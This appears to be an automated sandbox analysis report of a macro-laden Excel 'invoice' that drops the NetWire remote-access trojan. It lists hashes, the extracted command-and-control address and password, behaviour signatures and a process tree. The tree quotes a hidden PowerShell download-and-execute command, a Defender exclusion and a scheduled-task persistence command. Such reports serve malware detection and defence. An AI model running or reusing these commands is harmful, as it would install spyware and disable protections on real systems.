Analysis

  • max time kernel
    130s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-01-2023 08:08

General

  • Target

    invoice_78336.xlsm

  • Size

    42KB

  • MD5

    8588c1999a06ff9c06d12fee925b9018

  • SHA1

    af5ef23dbcc31847788d1a2522b689a8dfd0f124

  • SHA256

    c94cca2c1e58461023c08ac630cb28cb0940566373c8fa988c480736597a8840

  • SHA512

    62c175443fb7b0c58be53f84cdf78d441670eb1ecfed27d7c41f06505a8e036f81c4d7ea086c42cdfcf23d5256404dfccf2b6372fa1a538bbe66d8e54ac9305d

  • SSDEEP

    768:7lvRPlvHssndawBIJYfTH+niSpPvDH7iv+nW4FFiKk/f0qtM2CHWRQ+nYANm:ZvnvHTdawG1BxT7iv+PFFi3/8qahHWt+

Malware Config

Extracted

Family

netwire

C2

212.193.30.230:3363

Attributes
  • activex_autorun

    false

  • copy_executable

    false

  • delete_original

    false

  • host_id

    HostId-%Rand%

  • keylogger_dir

    %AppData%\Logs\

  • lock_executable

    false

  • offline_keylogger

    true

  • password

    Password@2

  • registry_autorun

    false

  • use_mutex

    false

Signatures

  • NetWire RAT payload 3 IoCs
  • Netwire

    Netwire is a RAT with main functionalities focused password stealing and keylogging, but also includes remote control capabilities as well.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\invoice_78336.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4928
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } –PassThru; Invoke-WebRequest -Uri "http://198.23.172.90/statement.exe" -OutFile $TempFile; Start-Process $TempFile;
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4880
      • C:\Users\Admin\AppData\Local\Temp\tmp9AFC.exe
        "C:\Users\Admin\AppData\Local\Temp\tmp9AFC.exe"
        3⤵
        • Executes dropped EXE
        • Checks computer location settings
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:2112
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\ARvNQxJkzcNg.exe"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4624
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ARvNQxJkzcNg" /XML "C:\Users\Admin\AppData\Local\Temp\tmp47C7.tmp"
          4⤵
          • Creates scheduled task(s)
          PID:2132
        • C:\Users\Admin\AppData\Local\Temp\tmp9AFC.exe
          "C:\Users\Admin\AppData\Local\Temp\tmp9AFC.exe"
          4⤵
          • Executes dropped EXE
          PID:3460

Network

MITRE ATT&CK Matrix ATT&CK v6

Execution

Scheduled Task

1
T1053

Persistence

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Discovery

Query Registry

3
T1012

System Information Discovery

4
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    9b53429e28f910e125239e95e23ef267

    SHA1

    8963b2eb63e21642545b2a023e7fb41332a23e13

    SHA256

    20f516fc915cd85d967a78663cdc344b70d99fcb79fc0f96bb199def8c7b4cd2

    SHA512

    db592560dc8c20866634be7cc0a576873e5e0efab6d8ba700eb5a822aa8fc409a337a474320df161bb45503608a6065664a15d685dc04994960706d5bc986055

  • C:\Users\Admin\AppData\Local\Temp\tmp47C7.tmp
    Filesize

    1KB

    MD5

    4495a85f9486b8806e4ef180e7d0172f

    SHA1

    9b8c678f22dbdf86f47f067901428b38b1eb3e98

    SHA256

    a51b06c1cbe309432e5c2830c4149cc64923f1f2de78ac812478837d69de8872

    SHA512

    4a1ef374a465bb3151d59f7b5b458622eed9cbd270a1edae3efd9526a82ccf5ec0a980867f9127a837fd4578b861ec71dfebc8be53bcaa57933e91c94cc1c49a

  • C:\Users\Admin\AppData\Local\Temp\tmp9AFC.exe
    Filesize

    767KB

    MD5

    f4cb41dd766d9936b4dcbca5075ffbc1

    SHA1

    e185a7639c26468f4fb62169b6037e2e4d99f75a

    SHA256

    85e8c923778743576884ef91502873590a7d6ae7675c526fbad2418091685bc0

    SHA512

    c3ea0c269177205c8573662ed5b5a9b6c242e9538c66c6b72871e2bc7d107d0db686b33c2e4ba2baf59a6877a07b9c2d65b2f50535e7d2eacffaf7f2274eb03a

  • C:\Users\Admin\AppData\Local\Temp\tmp9AFC.exe
    Filesize

    767KB

    MD5

    f4cb41dd766d9936b4dcbca5075ffbc1

    SHA1

    e185a7639c26468f4fb62169b6037e2e4d99f75a

    SHA256

    85e8c923778743576884ef91502873590a7d6ae7675c526fbad2418091685bc0

    SHA512

    c3ea0c269177205c8573662ed5b5a9b6c242e9538c66c6b72871e2bc7d107d0db686b33c2e4ba2baf59a6877a07b9c2d65b2f50535e7d2eacffaf7f2274eb03a

  • C:\Users\Admin\AppData\Local\Temp\tmp9AFC.exe
    Filesize

    767KB

    MD5

    f4cb41dd766d9936b4dcbca5075ffbc1

    SHA1

    e185a7639c26468f4fb62169b6037e2e4d99f75a

    SHA256

    85e8c923778743576884ef91502873590a7d6ae7675c526fbad2418091685bc0

    SHA512

    c3ea0c269177205c8573662ed5b5a9b6c242e9538c66c6b72871e2bc7d107d0db686b33c2e4ba2baf59a6877a07b9c2d65b2f50535e7d2eacffaf7f2274eb03a

  • memory/2112-148-0x00000000058A0000-0x0000000005932000-memory.dmp
    Filesize

    584KB

  • memory/2112-142-0x0000000000000000-mapping.dmp
  • memory/2112-146-0x0000000000EA0000-0x0000000000F66000-memory.dmp
    Filesize

    792KB

  • memory/2112-150-0x0000000008F30000-0x0000000008FCC000-memory.dmp
    Filesize

    624KB

  • memory/2112-149-0x0000000005800000-0x000000000580A000-memory.dmp
    Filesize

    40KB

  • memory/2112-147-0x0000000005DB0000-0x0000000006354000-memory.dmp
    Filesize

    5.6MB

  • memory/2132-152-0x0000000000000000-mapping.dmp
  • memory/3460-155-0x0000000000000000-mapping.dmp
  • memory/3460-164-0x0000000000400000-0x0000000000433000-memory.dmp
    Filesize

    204KB

  • memory/3460-157-0x0000000000400000-0x0000000000433000-memory.dmp
    Filesize

    204KB

  • memory/3460-160-0x0000000000400000-0x0000000000433000-memory.dmp
    Filesize

    204KB

  • memory/4624-168-0x00000000710C0000-0x000000007110C000-memory.dmp
    Filesize

    304KB

  • memory/4624-172-0x00000000072D0000-0x00000000072DA000-memory.dmp
    Filesize

    40KB

  • memory/4624-169-0x0000000006500000-0x000000000651E000-memory.dmp
    Filesize

    120KB

  • memory/4624-151-0x0000000000000000-mapping.dmp
  • memory/4624-176-0x0000000007580000-0x0000000007588000-memory.dmp
    Filesize

    32KB

  • memory/4624-153-0x0000000002660000-0x0000000002696000-memory.dmp
    Filesize

    216KB

  • memory/4624-175-0x00000000075A0000-0x00000000075BA000-memory.dmp
    Filesize

    104KB

  • memory/4624-156-0x0000000005210000-0x0000000005838000-memory.dmp
    Filesize

    6.2MB

  • memory/4624-174-0x0000000007490000-0x000000000749E000-memory.dmp
    Filesize

    56KB

  • memory/4624-171-0x0000000007250000-0x000000000726A000-memory.dmp
    Filesize

    104KB

  • memory/4624-167-0x0000000006520000-0x0000000006552000-memory.dmp
    Filesize

    200KB

  • memory/4624-166-0x0000000005F30000-0x0000000005F4E000-memory.dmp
    Filesize

    120KB

  • memory/4624-161-0x0000000004F80000-0x0000000004FA2000-memory.dmp
    Filesize

    136KB

  • memory/4624-162-0x0000000005040000-0x00000000050A6000-memory.dmp
    Filesize

    408KB

  • memory/4624-163-0x0000000005840000-0x00000000058A6000-memory.dmp
    Filesize

    408KB

  • memory/4624-173-0x00000000074E0000-0x0000000007576000-memory.dmp
    Filesize

    600KB

  • memory/4624-170-0x0000000007890000-0x0000000007F0A000-memory.dmp
    Filesize

    6.5MB

  • memory/4880-140-0x00000161B9430000-0x00000161B9452000-memory.dmp
    Filesize

    136KB

  • memory/4880-141-0x00007FFE76BF0000-0x00007FFE776B1000-memory.dmp
    Filesize

    10.8MB

  • memory/4880-139-0x0000000000000000-mapping.dmp
  • memory/4880-145-0x00007FFE76BF0000-0x00007FFE776B1000-memory.dmp
    Filesize

    10.8MB

  • memory/4928-136-0x00007FFE5F790000-0x00007FFE5F7A0000-memory.dmp
    Filesize

    64KB

  • memory/4928-137-0x00007FFE5D230000-0x00007FFE5D240000-memory.dmp
    Filesize

    64KB

  • memory/4928-133-0x00007FFE5F790000-0x00007FFE5F7A0000-memory.dmp
    Filesize

    64KB

  • memory/4928-138-0x00007FFE5D230000-0x00007FFE5D240000-memory.dmp
    Filesize

    64KB

  • memory/4928-132-0x00007FFE5F790000-0x00007FFE5F7A0000-memory.dmp
    Filesize

    64KB

  • memory/4928-134-0x00007FFE5F790000-0x00007FFE5F7A0000-memory.dmp
    Filesize

    64KB

  • memory/4928-135-0x00007FFE5F790000-0x00007FFE5F7A0000-memory.dmp
    Filesize

    64KB

  • memory/4928-178-0x00007FFE5F790000-0x00007FFE5F7A0000-memory.dmp
    Filesize

    64KB

  • memory/4928-179-0x00007FFE5F790000-0x00007FFE5F7A0000-memory.dmp
    Filesize

    64KB

  • memory/4928-180-0x00007FFE5F790000-0x00007FFE5F7A0000-memory.dmp
    Filesize

    64KB

  • memory/4928-181-0x00007FFE5F790000-0x00007FFE5F7A0000-memory.dmp
    Filesize

    64KB